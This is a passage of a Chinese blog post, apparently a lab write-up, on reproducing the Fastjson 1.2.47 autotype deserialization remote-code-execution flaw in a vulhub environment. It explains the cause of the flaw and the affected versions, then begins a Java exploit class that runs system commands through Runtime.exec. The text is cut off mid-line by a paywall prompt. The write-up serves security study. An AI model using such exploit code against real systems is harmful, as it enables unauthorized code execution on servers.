本文详细介绍了Fastjson的一个安全漏洞,该漏洞存在于Fastjson 1.2.47及更早版本中,主要由于autotype功能允许攻击者通过构造特定数据,触发类的setter或getter方法执行恶意逻辑。文章提供漏洞复现环境、实验步骤,包括利用java脚本、启动RMI服务器以及构造payload。修复建议是升级到1.2.83版本或启用SafeMode配置,并给出了多种配置方法。
零、写在前面
面试求职+南下杭州+租房+杂七杂八,一些事情索然,上周没有来得及学习并更新一款漏洞,怪尴尬的,还是太懒了……后面看看有没有时间补上吧。面试过程中,有三个比较重要的有价值的信息(关于漏洞和工作性质的),之后我也会拓展开新的模块(Java代码审计),进一步深入学习安全~
这里先来完成一下第一个比较有价值的漏洞——fastJson反序列化
一、漏洞概述
Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列 化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。
二、影响版本
- Fastjson <=1.2.47
三、漏洞原理
Fastjson提供了autotype功能,允许用户在反序列化数据中通过"@type"指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流 程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的"Gadget"),则会造成一些严重的安全问题。——https://blog.csdn.net/yandonglinxswl/article/details/123532540
四、漏洞复现环境
攻击机:Kali
漏洞环境:vulhub(/vulhub/fastjson/1.2.47-rce)
五、实验步骤
1.开启vulhub漏洞环境
2.创建利用java脚本并编译,开一个服务挂到网上
#TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"touc
最低0.47元/天 解锁文章
扫一扫
1074
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
